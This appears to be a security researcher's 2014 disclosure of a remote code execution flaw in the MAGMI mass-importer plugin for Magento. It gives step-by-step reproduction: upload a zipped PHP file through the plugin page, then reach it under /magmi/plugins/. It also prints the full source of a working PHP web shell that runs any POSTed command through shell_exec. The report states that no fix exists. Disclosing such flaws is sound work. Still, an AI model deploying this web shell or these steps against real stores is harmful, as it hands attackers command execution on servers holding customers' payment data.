Magento Server MAGMI Plugin - Remote File Inclusion (RFI)

2014-10-25 12:05:05

Exploit found date: 10/24/2014
Security Researcher name: Parvinder Singh Bhasin
Contact info: [email protected]
twitter: @parvinderb <scorpio>


Currently tested version:
Magento version: Magento CE - 1.8 and newer versions
MAGMI version: v0.7.17a and greater

MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server.

Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure.

Steps to reproduce:

1. http://<a magentosite.com>/magmi/web/magmi.php
2. Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed.

evil.php:

<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";

if(function_exists('shell_exec')) {
$command=$_POST['command'];
$output = shell_exec("$command");
echo "<pre>$output</pre>";
}
}
else {
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
}
?>

3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php

At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc.

Fixes

No fixes

In order to submit a new fix you need to be registered.